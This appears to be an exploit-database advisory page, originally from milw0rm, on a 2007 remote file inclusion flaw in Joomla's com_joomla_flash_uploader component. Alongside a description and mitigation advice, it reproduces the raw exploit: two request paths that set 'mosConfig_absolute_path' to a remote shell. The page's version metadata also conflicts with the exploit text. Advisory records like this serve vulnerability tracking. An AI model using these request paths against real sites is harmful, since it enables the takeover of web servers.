Joomla com_joomla_flash_uploader Remote File Include

vendor:

com_joomla_flash_uploader

by:

milw0rm

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: com_joomla_flash_uploader

Affected Version From: 2.5.2001

Affected Version To: 2.5.2002

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla com_joomla_flash_uploader Remote File Include

The Joomla com_joomla_flash_uploader component version 2.5.1 and 2.5.2 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by manipulating the 'mosConfig_absolute_path' parameter in the 'install.joomla_flash_uploader.php' and 'uninstall.joomla_flash_uploader.php' files to include a malicious file from a remote server.

Mitigation:

Update to the latest version of the Joomla com_joomla_flash_uploader component. Disable any unnecessary or unused components and extensions.

Source

Exploit-DB raw data:

--------------------------------------------
=                                          =
=            Mdx  (c) 2007                 =
=                                          =
--------------------------------------------
=                                          =
=Joomla com_joomla_flash_uploader Remote File Include  2.5.1,2.5.2  
=                                          =
============================================
=
= Download:
=
= http://download.joomlaportal.ch/content/view/1060/
=
============================================
=
= Exploit:
= administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
= administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
============================================
=                                          =
=TÃ¼m Ãslam Alemininin BayramÃ½ Mubarek olsun
=                                          =
============================================ 

 Thanks : Xoron,Deltaforce,Nizam-Ã¼l MÃ¼lk, Prime Suspect,CyberEx,mith,n0th!ng,CwPeker,Cyber_cobra,CyberWar,Musty
@zr@il-,DaRKToLe,ultrAslan_CW,quantumhalil,schevko ,nirvana_jr,mertcesur,reddevil19,hocam,muhammed4554,WarriorHacker
cepuzmani_53,kalaba,Dr.X 

---------------------------------------

# milw0rm.com [2007-10-11]